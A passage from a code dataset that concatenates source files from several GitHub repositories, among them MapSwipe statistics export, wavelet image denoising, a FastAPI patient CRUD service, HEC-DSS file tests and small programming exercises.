type\n'''\n\n","repo_name":"sumit123123/Python","sub_path":"Chapter 4/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"10241651752","text":"import os\n\nimport pandas as pd\n\nfrom mapswipe_workers import auth\nfrom mapswipe_workers.definitions import logger\nfrom mapswipe_workers.utils import geojson_functions\n\n\ndef get_overall_stats(projects_df: pd.DataFrame, filename: str) -> pd.DataFrame:\n    \"\"\"\n    The function aggregates the statistics per project using the status attribute.\n    We derive aggregated statistics for active, inactive and finished projects.\n    The number of users should not be summed up here, since this would generate wrong\n    results.\n    A single user can contribute to multiple projects, we need to consider this.\n\n    Parameters\n    ----------\n    projects_df: pd.DataFrame\n    filename: str\n    \"\"\"\n    projects_df[\"number_of_users\"].fillna(0, inplace=True)\n    overall_stats_df = projects_df.groupby([\"status\"]).agg(\n        count_projects=pd.NamedAgg(column=\"project_id\", aggfunc=\"count\"),\n        area_sqkm=pd.NamedAgg(column=\"area_sqkm\", aggfunc=\"sum\"),\n        number_of_results=pd.NamedAgg(column=\"number_of_results\", aggfunc=\"sum\"),\n        number_of_results_progress=pd.NamedAgg(\n            column=\"number_of_results_progress\", aggfunc=\"sum\"\n        ),\n        average_number_of_users_per_project=pd.NamedAgg(\n            column=\"number_of_users\", aggfunc=\"mean\"\n        ),\n    )\n\n    overall_stats_df.to_csv(filename, index_label=\"status\")\n    logger.info(f\"saved overall stats to {filename}\")\n\n    return overall_stats_df\n\n\ndef get_project_static_info(filename: str) -> pd.DataFrame:\n    \"\"\"\n    The function queries the projects table.\n    Each row represents a single project and provides the information which is static.\n    By static we understand all attributes which are not affected by new results being\n    contributed.\n    The results are stored in a csv file and also returned as a pandas DataFrame.\n\n    Parameters\n    ----------\n    filename: str\n    \"\"\"\n\n    pg_db = auth.postgresDB()\n\n    # make sure to replace newline characters here\n    sql_query = \"\"\"\n        COPY (\n            SELECT\n                project_id\n                ,regexp_replace(name, E'[\\\\n\\\\r]+', ' ', 'g' ) as name\n                ,regexp_replace(project_details, E'[\\\\n\\\\r]+', ' ', 'g' ) as\n            
project_details\n ,regexp_replace(look_for, E'[\\\\n\\\\r]+', ' ', 'g' ) as look_for\n ,project_type\n ,image\n ,created\n -- Custom options values\n ,CASE\n WHEN (\n project_type_specifics->'customOptions' IS NOT NULL AND\n (project_type_specifics->'customOptions')::TEXT != 'null'::TEXT\n )\n THEN -- thus if we have answer labels use them\n (project_type_specifics->'customOptions')::TEXT\n ELSE -- otherwise use below label range as the mapswipe app default\n '[{\"value\": 0}, {\"value\": 1}, {\"value\": 2}, {\"value\": 3}]'::TEXT\n END as custom_options\n -- add an array of the tile server names\n ,CASE\n WHEN project_type_specifics->'tileServer'->'name' IS NOT NULL THEN\n Array[project_type_specifics->'tileServer'->>'name']\n ELSE Array[project_type_specifics->'tileServerA'->>'name',\n project_type_specifics->'tileServerB'->>'name']\n END as tile_server_names\n ,regexp_replace(status, E'[\\\\n\\\\r]+', ' ', 'g' ) as status\n ,ST_Area(geom::geography)/1000000 as area_sqkm\n ,ST_AsText(geom) as geom\n ,ST_AsText(ST_Centroid(geom)) as centroid\n FROM projects\n ) TO STDOUT WITH CSV HEADER\"\"\"\n\n with open(filename, \"w\") as f:\n pg_db.copy_expert(sql_query, f)\n\n del pg_db\n logger.info(\"got projects from postgres.\")\n\n df = pd.read_csv(filename)\n\n return df\n\n\ndef load_project_info_dynamic(filename: str) -> pd.DataFrame:\n \"\"\"\n The function loads data from a csv file into a pandas dataframe.\n If not file exists, it will be initialized.\n\n Parameters\n ----------\n filename: str\n \"\"\"\n\n if os.path.isfile(filename):\n logger.info(f\"file {filename} exists. Init from this file.\")\n df = pd.read_csv(filename, index_col=\"idx\")\n else:\n columns = [\n \"project_id\",\n \"progress\",\n \"number_of_users\",\n \"number_of_results\",\n \"number_of_results_progress\",\n \"day\",\n ]\n df = pd.DataFrame(index=[], columns=columns)\n df[\"project_id\"].astype(\"str\")\n\n return df\n\n\ndef save_projects(\n filename: str, df: pd.DataFrame, df_dynamic: pd.DataFrame\n) -> pd.DataFrame:\n \"\"\"\n The function merges the dataframes for static and dynamic project information\n and then save the result as csv file.\n Additionally, two geojson files are generated using\n (a) the geometry of the projects and\n (b) the centroid of the projects.\n\n Parameters\n ----------\n filename: str\n df: pd.DataFrame\n df_dynamic: pd.DataFrame\n \"\"\"\n\n projects_df = df.merge(\n df_dynamic, left_on=\"project_id\", right_on=\"project_id\", how=\"left\"\n )\n projects_df.to_csv(filename, index_label=\"idx\", line_terminator=\"\\n\")\n logger.info(f\"saved projects: {filename}\")\n geojson_functions.csv_to_geojson(filename, \"geom\")\n geojson_functions.csv_to_geojson(filename, \"centroid\")\n\n return projects_df\n","repo_name":"mapswipe/python-mapswipe-workers","sub_path":"mapswipe_workers/mapswipe_workers/generate_stats/overall_stats.py","file_name":"overall_stats.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"21751177124","text":"keys = int(input())\nmax_press = list(map(int, input().split()))\ntotal_press = int(input())\npresses = list(map(int, input().split()))\na_dict = {index: i for index, i in enumerate(max_press, 1)}\n\nfor press in presses:\n a_dict[press] -= 1\n\nfor key in a_dict:\n if a_dict[key] < 0:\n print('YES')\n else:\n 
print('NO')\n","repo_name":"BatarchiZ/HSE_Python_YC6","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39286563414","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom skimage import restoration\nfrom .helper import convertTo\n\n\n__all__ = ['aTrousTransform', 'iATrousTransform', 'rlDeconvolve',\n 'starletKernel']\n\n\ndef rlDeconvolve(img_data, psfFunction, psfParam, psfWidth=16, iterations=30):\n # skimage.restoration.richardson_lucy accepts float64 as input\n img_data_64 = convertTo(img_data, np.float64)\n # Set up PSF\n xx = np.linspace(-psfWidth, psfWidth, 2 * psfWidth + 1, dtype=np.float64)\n X, Y = np.meshgrid(xx, xx)\n pos = np.array([X.ravel(), Y.ravel()]).T\n psf = psfFunction(pos, 1.0, 0.0, 0.0, psfParam[0], psfParam[1],\n psfParam[2], psfParam[3], 0.0).reshape(2 * psfWidth + 1,\n 2 * psfWidth + 1)\n # Deconvolve\n if img_data_64.ndim != 3:\n img_deconv = restoration.richardson_lucy(img_data_64, psf,\n iterations=iterations)\n else:\n img_deconv = np.empty(img_data_64.shape)\n for i in range(img_data_64.shape[-1]):\n img_deconv[:, :, i] = restoration.richardson_lucy(\n img_data_64[:, :, i], psf, iterations=iterations)\n return img_deconv\n\n\ndef starletKernel(level):\n '''\n B3-spline kernel for starlet transformation. The scaling function is\n \\phi(x) = 1/12 (|x-2|^3-4|x-1|^3+6|x|^3-4|x+1|^3+|x+2|^3)\n Thus the coeffcient for convolution is (1/16, 1/4, 3/8, 1/4, 1/16)\n\n Parameters\n ----------\n level: unsigned integer\n Level of the wavelet transformation. The distance between each\n coefficient is 2 ** level.\n\n Returns\n -------\n numpy.ndarray of shape (4 * 2 ** level + 1) and dtype == numpy.float32\n The kernel for convolution\n\n Raises\n ------\n None\n '''\n step = 2 ** level\n k_length = 4 * step + 1\n kernel = np.zeros((k_length), dtype=np.float64)\n kernel[0] = 1.0 / 16.0\n kernel[step] = 4.0 / 16.0\n kernel[2 * step] = 6.0 / 16.0\n kernel[3 * step] = 4.0 / 16.0\n kernel[-1] = 1.0 / 16.0\n return kernel\n\n\ndef _convValid(x, y):\n return np.convolve(x, y, 'valid')\n\n\ndef _convolve2DHDR(img_data, kernel):\n '''\n High dynamic range 2D convolve. Instead of FFT, this function use\n direct convolve, which is considerably slower. However, it is still\n suprisingly fast.\n '''\n to_fill_length = int(np.floor(len(kernel) / 2))\n np_conv2d = np.vectorize(_convValid, signature='(n),(m)->(k)')\n # Row convolve\n tmp_row = np.pad(img_data, ((0, 0), (to_fill_length, to_fill_length)),\n 'symmetric')\n row_conv = np_conv2d(tmp_row, kernel)\n # Column convolve\n tmp_col = row_conv.T\n tmp_col = np.pad(tmp_col, ((0, 0), (to_fill_length, to_fill_length)),\n 'symmetric')\n col_conv = np_conv2d(tmp_col, kernel)\n return col_conv.T\n\n\ndef aTrousTransform(img_data, kernelFunc, max_level=5):\n '''\n Algorithm a trous (aka stationary wavelet transform) for 2D image.\n Convolution is taken care of through OpenCV. Assume kernel is separable\n in 2-D and the kernels are the same.\n\n Parameters\n ----------\n img_data: 2D numpy.ndarray\n Input image data. Automatically converted to numpy.float32.\n kernelFunc: function\n Function with level as input and convolution kernel as return\n max_level: unsigned integer, default 5\n Maximum level to wavelet transform. Starts with 0.\n\n Returns\n -------\n List of numpy.ndarray\n List of coefficent and approximation (w_0, ... 
w_{max_level-1},\n c_{max_level})\n\n Raises\n ------\n None\n '''\n if img_data.dtype != np.float64:\n img_in = convertTo(img_data, np.float64)\n else:\n img_in = img_data\n img_out = None\n res = []\n for i in range(max_level):\n kernel = kernelFunc(i)\n img_out = _convolve2DHDR(img_in, kernel)\n res.append(img_in - img_out)\n img_in = img_out\n res.append(img_out)\n return res\n\n\ndef iATrousTransform(coeff, kernelFunc):\n '''\n Inverse a Trous transform.\n\n Parameters\n ----------\n coeff: list of numpy.ndarray\n List of coefficients from aTrousTransform\n\n Returns\n -------\n 2D numpy.ndarray\n Reconstructed image\n\n Raises\n ------\n None\n '''\n return np.sum(coeff, axis=0)\n\n\ndef msLinearTransform(img_data, img_mask, maxLevel, tList, iList, sList,\n transFunc=[aTrousTransform, iATrousTransform],\n kernelFunc=starletKernel):\n '''\n Multi-scale Linear Transform\n For noise reduction purpose, adapted from:\n Starck J-L, Bijaoui A, Murtagh F (1995) Multiresolution support applied\n to image filtering and deconvolution. CVGIP: Graph Models Image Process\n 57: 420-431\n\n Parameters\n ----------\n img_data: 2D numpy.ndarray\n Input image data. For colored image, extract its luminance channel and\n then feed into this function\n img_mask: 2D numpy.ndarray\n Input image mask\n maxLevel: int\n Maximum level of decomposition\n tList: numpy.array of float, length == maxLevel\n List of threshold for each level, if filtering is not needed, use 0.0\n iList: list of int, length == maxLevel\n List of iterations for each level, if filtering is not needed for\n certain level, use 0\n sList: list of float, length == maxLevel, every value between 0.0 and 1.0\n List of strength for each level, 0.0 for no modification, 1.0 for\n denoise data only, value in between for linear combination of both\n transFunc: list of functions, length == 2\n [Transform function, inverse transform function]\n kernelFunc: function\n Kernel function for wavelet transform\n\n Returns\n -------\n img_recon: 2D numpy.ndarray, same shape as img_data\n Denoised image\n\n Raises\n ------\n ValueError\n '''\n if len(tList) != maxLevel or len(iList) != maxLevel:\n raise ValueError(\"tList and iList must have length of maxLevel\")\n if img_data.ndim != 2:\n raise TypeError(\"img_data must be 2D. 
For colored image, extract\" +\n                        \" its luminance channel\")\n    # Cast everything to float64\n    img_data_64 = convertTo(img_data, np.float64)\n    img_mask_64 = convertTo(img_mask, np.float64)\n    # Estimate the relation between image space and frequency space\n    # TODO: support look-up table for given transformation and kernel\n    img_test = np.random.normal(0.0, 1.0, (2048, 2048))\n    img_test_swt = transFunc[0](img_test, kernelFunc, maxLevel)\n    noise_sigma_coeff = np.std(img_test_swt[:-1], axis=(1, 2))\n    # Estimate noise of the image and determine filtering threshold\n    img_swt = transFunc[0](img_data_64, kernelFunc, maxLevel)\n    img_noise_sigma = np.std(img_swt[0]) / noise_sigma_coeff[0] * \\\n        noise_sigma_coeff\n    print(img_noise_sigma[0] / noise_sigma_coeff[0])\n    thres_list = tList * img_noise_sigma\n    # Iteration\n    n = 0\n    sol = np.zeros_like(img_data_64)\n    err = np.zeros_like(img_data_64)\n    while n < np.max(iList):\n        err = img_data_64 - sol\n        err_swt = transFunc[0](err, kernelFunc, maxLevel)\n        # Filter each level except residual\n        for i in range(maxLevel):\n            if n < iList[i]:\n                tf = np.logical_and(err_swt[i] > -thres_list[i],\n                                    err_swt[i] < thres_list[i])\n                err_swt[i][tf] *= (1.0 - img_mask_64[tf] * sList[i])\n        # Reconstruct\n        err_iswt = transFunc[1](err_swt, kernelFunc)\n        sol += err_iswt\n        n += 1\n    return sol\n","repo_name":"chengxinlun/OpenAP","sub_path":"OpenAP/frequency.py","file_name":"frequency.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"18593036326","text":"from fastapi import FastAPI, Depends, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Session\n\nfrom . import crud, models, schemas\nfrom .database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n\norigins = [\n    \"http://localhost\",\n    \"http://localhost:8000\",\n    \"http://localhost:3000\"\n]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=False,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\n\ndef get_db():\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\n@app.get(\"/\")\ndef read_root():\n    return \"Hello!\"\n\n@app.get(\"/patients\", response_model=list[schemas.Patient])\ndef read_patients(skip: int = 0, limit: int = 10, db: Session = Depends(get_db)):\n    patients = crud.read_patients(db, skip=skip, limit=limit)\n    return patients\n\n@app.get(\"/patients/{patient_id}\", response_model=schemas.Patient)\ndef read_patient(patient_id: int, db: Session = Depends(get_db)):\n    db_patient = crud.read_patient(db, patient_id=patient_id)\n    if db_patient is None:\n        raise HTTPException(status_code=404, detail=\"Patient not found.\")\n    return db_patient\n\n@app.post(\"/patients\", response_model=schemas.Patient)\ndef create_patients(patient: schemas.CreatePatient, db: Session = Depends(get_db)):\n    return crud.create_patient(db=db, patient=patient)\n\n@app.put(\"/patients/{patient_id}\")\ndef update_patients(patient: schemas.Patient, db: Session = Depends(get_db)):\n    crud.update_patient(db, patient=patient)\n    return patient\n\n@app.delete(\"/patients/{patient_id}\")\ndef delete_patients(patient_id: int, db: Session = Depends(get_db)):\n    db_patient = crud.delete_patient(db, patient_id=patient_id)\n    return 
db_patient","repo_name":"riangdasilva/patient-system","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4238489046","text":"from __future__ import annotations\nfrom typing import List\nimport time\nFLOATING_POINT_ACCURACY = 1.0e-6\n\nX = 0\nY = 1\nZ = 2\n\np1 = (0,0,0)\np1x = 0\np1y = 0\np2 = (1,1,1)\np2x = 1\np2y = 1\np3 = (0,2,0)\np3x = 0\np3y = 0\n\n\ndef triangleAreaXY(p1x,p1y,p2x,p2y,p3x,p3y) :\n \n a = abs(p1x*(p2y-p3y) +p2x*(p3y-p1y) +p3x*(p1y-p2y))/2.0\n return a\n\n\n# //if include_edge is false : if the point is on the edge, is NOT inside. \n# //if include_edge is true : if the point is on the edge, is inside. \ndef insideTriangleXY(px,py, include_edge : bool) -> bool :\n area = triangleAreaXY(p1x,p1y,p2x,p2y,p3x,p3y)\n area1 = triangleAreaXY(px,py,p2x,p2y,p3x,p3y)\n area2 = triangleAreaXY(p1x,p1y,px,py,p3x,p3y)\n area3 = triangleAreaXY(p1x,p1y,p2x,p2y,px,py)\n if not include_edge :\n if (area1 <= FLOATING_POINT_ACCURACY) or (area2 <= FLOATING_POINT_ACCURACY) or (area3 <= FLOATING_POINT_ACCURACY) :\n return False\n ins = (abs(area1+area2+area3) - area) <= (FLOATING_POINT_ACCURACY * area)\n return ins\n\n\nif __name__ == '__main__':\n start_ms = time.perf_counter()\n\n a = (0,1,2)\n ax = 0\n ay = 1\n for i in range(int(1e6)):\n insideTriangleXY(ax,ay, True )\n\n end_ms = time.perf_counter()\n print(f\"duration : {end_ms - start_ms}\")\n","repo_name":"windancert/line_triangle_projection","sub_path":"java_vs_python/testme2.py","file_name":"testme2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32119066576","text":"T = int(input())\n\ndef sol(testcases):\n ans = []\n for i in range(testcases):\n n = input()\n canList = [int(x) for x in str(input()).split()]\n result = sum(canList)\n if result %2 == 0:\n ans.append('NO')\n else:\n ans.append('YES')\n \n for i in range(len(ans)):\n print(ans[i])\n\nsol(T)\n","repo_name":"arjkashyap/competitive-coding","sub_path":"codechef/cndlove.py","file_name":"cndlove.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4516570301","text":"# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n\nif __name__ == '__main__':\n    nums = input()\n    nums = nums.split(\" \")\n    rows = int(nums[0])\n    cols = int(nums[1])\n    block = \".|.\"\n    top = \"\"\n    bottom = \"\"\n    for i in range(rows//2):\n        row = block.center(cols, \"-\")\n        if i != 0:\n            top += \"\\n\" + row\n        else:\n            top += row\n        bottom = row + \"\\n\" + bottom\n        block += \".|..|.\"\n    \n    print(top)\n    print(\"WELCOME\".center(cols, \"-\"))\n    print(bottom)","repo_name":"ThomasJRooney/practice","sub_path":"hackerrank/python/doormat.py","file_name":"doormat.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
+{"seq_id":"465860693","text":"from pyhecdss.pyhecdss import DSSFile\r\nimport unittest\r\nimport pytest\r\nimport pyhecdss\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass TestPyDsUtilsBasic(unittest.TestCase):\r\n\r\n    def cleanTempFiles():\r\n        file_list = ['./test_rts1.dss',\r\n                     './test_rts1.dsc',\r\n                     './test_rts1.dsd',\r\n                     './test_its1.dss',\r\n                     './test_its1.dsc',\r\n                     './test_its1.dsd',\r\n                     './test.dsc',\r\n                     './test.dsd',\r\n                     './test.dsc',\r\n                     './test.dsd',\r\n                     './test.dsk',\r\n                     './test_offset.dss',\r\n                     './test_rts1.dss',\r\n                     './test2.dss',\r\n                     './testnew.dss']\r\n\r\n        for file in file_list:\r\n            try:\r\n                os.remove(file)\r\n            except OSError:\r\n                pass\r\n\r\n    # unittest only calls the camel-cased setUpClass hook\r\n    @classmethod\r\n    def setUpClass(cls):\r\n        cls.cleanTempFiles()\r\n\r\n    @classmethod\r\n    def tearDownClass(cls):\r\n        cls.cleanTempFiles()\r\n\r\n    def test_with(self):\r\n        with pyhecdss.DSSFile('test1.dss') as d:\r\n            assert len(d.read_catalog()) > 0\r\n\r\n    def test_open_close(self):\r\n        fname = \"test1.dss\"\r\n        dssfile = pyhecdss.DSSFile(fname)\r\n        dssfile.open()\r\n        dssfile.close()\r\n\r\n    def test_catalog(self):\r\n        fname = \"test1.dss\"\r\n        with pyhecdss.DSSFile(fname) as dssfile:\r\n            dssfile.catalog()\r\n        self.assertTrue(os.path.exists('test1.dsc'))\r\n        self.assertTrue(os.path.exists('test1.dsd'))\r\n\r\n    def test_read_ts(self):\r\n        fname = \"test1.dss\"\r\n        pathname = '/SAMPLE/SIN/WAVE/01JAN1990/15MIN/SAMPLE1/'\r\n        sdate = '01JAN1990'\r\n        edate = '31JAN1990'\r\n        with pyhecdss.DSSFile(fname) as dssfile:\r\n            values, units, periodtype = dssfile.read_rts(pathname, sdate, edate)\r\n        self.assertEqual(units, 'UNIT-X')\r\n        self.assertEqual(periodtype, 'INST-VAL')\r\n        self.assertEqual(len(values['10JAN1990': '11JAN1990'].values),\r\n                         96*2)  # 96 15 min values per day\r\n        # get series\r\n        vseries = values.iloc[:, 0]\r\n        self.assertTrue(abs(vseries.at['01JAN1990 0430']-(-0.42578)) < 1e-03)\r\n\r\n    def test_write_ts(self):\r\n        fname = \"test_rts1.dss\"\r\n        pathname = '/TEST1/ONLY1/VANILLA//1DAY/JUST-ONES/'\r\n        startDateStr, endDateStr = '01JAN1990 0100', '01JAN1991 0100'\r\n        dtr = pd.date_range(startDateStr, endDateStr, freq='1D')\r\n        df = pd.DataFrame(np.ones(len(dtr), 'd'), index=dtr)\r\n        cunits, ctype = 'CCC', 'INST-VAL'\r\n        with pyhecdss.DSSFile(fname, create_new=True) as dssfile2:\r\n            dssfile2.write_rts(pathname, df, cunits, ctype)\r\n        startDateStr = \"01JAN1990\"\r\n        endDateStr = \"01JAN1991\"\r\n        with pyhecdss.DSSFile(fname) as dssfile1:\r\n            df2, cunits2, ctype2 = dssfile1.read_rts(pathname, startDateStr, endDateStr)\r\n        self.assertEqual(ctype, ctype2)\r\n        self.assertEqual(cunits, cunits2)\r\n        self.assertEqual(1, df.iloc[0, 0])\r\n\r\n    def test_write_rts_series(self):\r\n        '''\r\n        write_rts should work with pandas.Series as well.\r\n        '''\r\n        fname = \"test_rts1.dss\"\r\n        pathname = '/TEST1/ONLY1/VANILLA//1DAY/JUST-ONES-SERIES/'\r\n        
startDateStr, endDateStr = '01JAN1990 0100', '01JAN1991 0100'\r\n dtr = pd.date_range(startDateStr, endDateStr, freq='1D')\r\n s = pd.Series(np.ones(len(dtr), 'd'), index=dtr)\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname, create_new=True) as dssfile2:\r\n dssfile2.write_rts(pathname, s, cunits, ctype)\r\n startDateStr = \"01JAN1990\"\r\n endDateStr = \"01JAN1991\"\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_rts(pathname, startDateStr, endDateStr)\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(1, s.iloc[0])\r\n\r\n def test_read_its(self):\r\n fname = \"test1.dss\"\r\n pathname = '/SAMPLE/ITS1/RANDOM/01JAN1990 - 01JAN1992/IR-YEAR/SAMPLE2/'\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n values, units, periodtype = dssfile.read_its(pathname)\r\n self.assertEqual(units, 'YYY')\r\n self.assertEqual(periodtype, 'INST-VAL')\r\n self.assertEqual(len(values), 3)\r\n # get series\r\n vseries = values.iloc[:, 0]\r\n self.assertTrue(abs(vseries.at['01JAN1990 0317']-1.5) < 1e-03)\r\n self.assertTrue(abs(vseries.at['05SEP1992 2349']-2.7) < 1e-03)\r\n\r\n def test_read_its_tw(self):\r\n # issue #26\r\n fname = \"test1.dss\"\r\n pathname = '/SAMPLE/ITS1/RANDOM/01JAN1990 0143 - 01JAN1992/IR-YEAR/SAMPLE2/'\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n values, units, periodtype = dssfile.read_its(pathname)\r\n self.assertEqual(units, 'YYY')\r\n self.assertEqual(periodtype, 'INST-VAL')\r\n self.assertEqual(len(values), 3)\r\n\r\n def test_write_its(self):\r\n fname = \"test1.dss\"\r\n pathname = '/TEST/ITS1/VANILLA//IR-YEAR/RANDOM/'\r\n ta = pd.to_datetime(['01apr1990', '05nov1991', '07apr1997'], format='%d%b%Y')\r\n df = pd.DataFrame([0.5, 0.6, 0.7], index=ta, columns=[\"random\"])\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname) as dssfile2:\r\n dssfile2.write_its(pathname, df, cunits, ctype)\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_its(pathname, \"01JAN1990\", \"01JAN1998\")\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(df2.iloc[0, 0], df.iloc[0, 0])\r\n self.assertEqual(df2.iloc[1, 0], df.iloc[1, 0])\r\n self.assertEqual(df2.iloc[2, 0], df.iloc[2, 0])\r\n\r\n def test_write_its_series(self):\r\n fname = \"test1.dss\"\r\n pathname = '/TEST/ITS1/VANILLA//IR-YEAR/RANDOM/'\r\n ta = pd.to_datetime(['01apr1990', '05nov1991', '07apr1997'], format='%d%b%Y')\r\n df = pd.Series([0.5, 0.6, 0.7], index=ta)\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname) as dssfile2:\r\n dssfile2.write_its(pathname, df, cunits, ctype)\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_its(pathname, \"01JAN1990\", \"01JAN1998\")\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(df2.iloc[0, 0], df.iloc[0])\r\n self.assertEqual(df2.iloc[1, 0], df.iloc[1])\r\n self.assertEqual(df2.iloc[2, 0], df.iloc[2])\r\n\r\n def test_read_catalog(self):\r\n fname = \"test1.dss\"\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n df = dssfile.read_catalog()\r\n self.assertTrue(len(df) >= 1)\r\n\r\n def test_get_pathnames(self):\r\n fname = \"test1.dss\"\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n pathnames = dssfile.get_pathnames()\r\n self.assertTrue(len(pathnames) > 0)\r\n\r\n def test_version(self):\r\n fname = \"test1.dss\"\r\n cver, iver = pyhecdss.get_version(fname)\r\n self.assertEqual(6, iver)\r\n 
self.assertEqual('6-VE', cver)\r\n\r\n def test_set_message_level(self):\r\n fname = \"test1.dss\"\r\n print(\"No easy way to check automatically. Just look at screen and see if lot of messages are printed?\")\r\n pyhecdss.set_message_level(10)\r\n with pyhecdss.DSSFile(fname) as d1:\r\n d1.close()\r\n print('No easy way to check automatically. Just look at screen and no DSS messages should be printed')\r\n pyhecdss.set_message_level(0)\r\n with pyhecdss.DSSFile(fname) as d1:\r\n d1.close()\r\n\r\n def test_except_on_bad_path(self):\r\n fname = \"test1.dss\"\r\n dssfile = pyhecdss.DSSFile(fname)\r\n pathname = '/SAMPLE/INVALID_MARKER/WAVE/01JAN1990/15MIN/SAMPLE1/'\r\n sdate = '01JAN1990'\r\n edate = '31JAN1990'\r\n # changed to a debugging level message so no error is now raised on missing pathname\r\n # values,units,periodtype=dssfile.read_rts(pathname,sdate,edate)\r\n\r\n def test_missing_dir(self):\r\n '''\r\n missing directory in filename causes crash. So check before trying to open\r\n '''\r\n fname = 'testnew.dss'\r\n if os.path.exists(fname):\r\n os.remove(fname)\r\n with pyhecdss.DSSFile(fname, create_new=True) as d:\r\n d.close()\r\n assert os.path.exists(fname)\r\n with pytest.raises(FileNotFoundError):\r\n fname2 = 'no_such_dir/testnew.dss'\r\n d = pyhecdss.DSSFile(fname2)\r\n d.close()\r\n\r\n def test_num_values_in_interval(self):\r\n fname = 'testnew.dss'\r\n if os.path.exists(fname):\r\n os.remove(fname)\r\n with pyhecdss.DSSFile(fname, create_new=True) as d:\r\n d.close()\r\n # only checking if values are greater than expected, HECLIB will return the exact number of values found\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1DAY') > 31\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1MON') > 1\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1YEAR') > 0\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"CADWRDeltaModeling/pyhecdss","sub_path":"tests/test_pyhecdss.py","file_name":"test_pyhecdss.py","file_ext":"py","file_size_in_byte":9411,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"17681892973","text":"from typing import KeysView\nimport pytest\n\nfrom layerstack.args import ArgMode, Arg, Kwarg, ArgList, KwargDict, get_short_name\n\n\ndef test_arglist_creation():\n # Variants that should work\n args = ArgList()\n\n arg1 = Arg('pv_penetration',parser=float)\n arg2 = Arg('house_size_threshold',parser=float,\n description='minimum size in ft2 for house to get pv')\n \n args = ArgList([arg1])\n args = ArgList([arg1,arg2])\n assert len(args) == 2, \"Expected to create ArgList with two items, but have {}.\".format(len(args))\n assert args.mode == ArgMode.DESC\n\n # Variants that should not work\n with pytest.raises(Exception):\n ArgList(arg1)\n with pytest.raises(Exception):\n ArgList(arg1,arg2)\n\n\ndef test_kwarg_creation():\n # Variants that should work\n kwargs = KwargDict()\n kwargs['max_pv_systems'] = Kwarg(parser=int,description='Maximum number of PV systems to install.')\n kwargs['fix_tap_changers'] = Kwarg(parser=bool,description='Whether to fix tap changer positions',\n action='store_true',default=False)\n kwargs['change_rate'] = Kwarg(parser=float,description=\"Rate of change (fraction)\",\n default=0.01)\n assert len(kwargs) == 3\n assert kwargs['max_pv_systems'].name == 'max_pv_systems'\n\n kwargs = KwargDict([('max_pv',kwargs['max_pv_systems']),\n ('fix_taps',kwargs['fix_tap_changers']),\n ('change-rate', 
kwargs['change_rate'])])\n assert len(kwargs) == 3\n assert kwargs['max_pv'].name == 'max_pv'\n assert kwargs['max_pv'].get_name() == 'max_pv'\n assert kwargs['change-rate'].name == 'change-rate'\n assert kwargs['change-rate'].get_name() == 'change_rate'\n assert kwargs['change-rate'].get_name(cleaned=False) == 'change-rate'\n\n with pytest.raises(Exception):\n KwargDict(kwargs['max_pv'])\n\n\ndef test_get_short_name():\n short_names = ['r', 'd', 'h']\n\n assert get_short_name('dredge', short_names=short_names) == 'dr'\n assert get_short_name('rude-awakening', short_names=short_names) == 'ra'\n assert get_short_name('recharge_area', short_names=short_names) == 'rea'\n","repo_name":"Smart-DS/layerstack","sub_path":"layerstack/tests/test_args_kwargs.py","file_name":"test_args_kwargs.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"38811162595","text":"import re\n\nimport 